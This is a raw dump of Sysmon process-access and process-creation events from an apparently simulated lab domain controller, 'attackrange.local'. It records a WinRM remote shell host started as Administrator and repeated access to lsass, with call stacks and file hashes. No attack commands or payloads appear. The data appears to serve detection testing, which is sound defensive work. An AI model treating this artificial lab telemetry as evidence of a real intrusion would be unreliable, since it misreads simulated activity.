13:08:45.434{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.387{08A6967A-40E0-6000-1400-000000009901}13004092C:\Windows\system32\svchost.exe{08A6967A-425D-6000-D102-000000009901}2564C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.387{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-425D-6000-D102-000000009901}2564C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.371{08A6967A-425D-6000-D202-000000009901}45722460C:\Windows\system32\conhost.exe{08A6967A-425D-6000-D102-000000009901}2564C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40D2-6000-0500-000000009901}644660C:\Windows\system32\csrss.exe{08A6967A-425D-6000-D202-000000009901}4572C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40D2-6000-0500-000000009901}6441160C:\Windows\system32\csrss.exe{08A6967A-425D-6000-D102-000000009901}2564C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-425D-6000-D102-000000009901}2564C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.362{08A6967A-425D-6000-D102-000000009901}2564C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-425D-6000-7315-110000000000}0x1115730HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{08A6967A-40DF-6000-0C00-000000009901}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.356{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.824{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.824{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.824{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.762{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.762{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 